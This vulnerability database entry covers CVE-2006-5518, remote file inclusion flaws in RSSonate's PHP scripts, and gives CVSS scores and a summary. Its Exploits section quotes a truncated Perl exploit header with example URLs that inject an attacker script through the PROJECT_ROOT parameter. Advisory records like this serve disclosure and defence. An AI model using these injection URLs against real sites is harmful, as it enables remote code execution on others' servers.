7.5
CVSSv2

CVE-2006-5518

Published: 26/10/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple PHP remote file inclusion vulnerabilities in Christopher Fowler (Rhode Island) RSSonate allow remote malicious users to execute arbitrary PHP code via a URL in the PROJECT_ROOT parameter to (1) xml2rss.php, (2) config_local.php, (3) rssonate.php, and (4) sql2xml.php in Src/getFeed/inc/.

Vulnerable Product Search on Vulmon Subscribe to Product

christopher fowler rssonate

Exploits

#!/usr/bin/perl # # RSSonate remote Command Execution Vulnerabilities # # Risk : High (Remote Code Execution) # # Url: wwwgoccgov/groups/RI_SOS/software/sqltorss # # Exploit: # sitecom/[path]/Src/getFeed/inc/xml2rssphp?PROJECT_ROOT=[Evil_Script] # sitecom/[path]/Src/getFeed/inc/config_localphp?PROJECT_ROOT=[Evil_Sc ...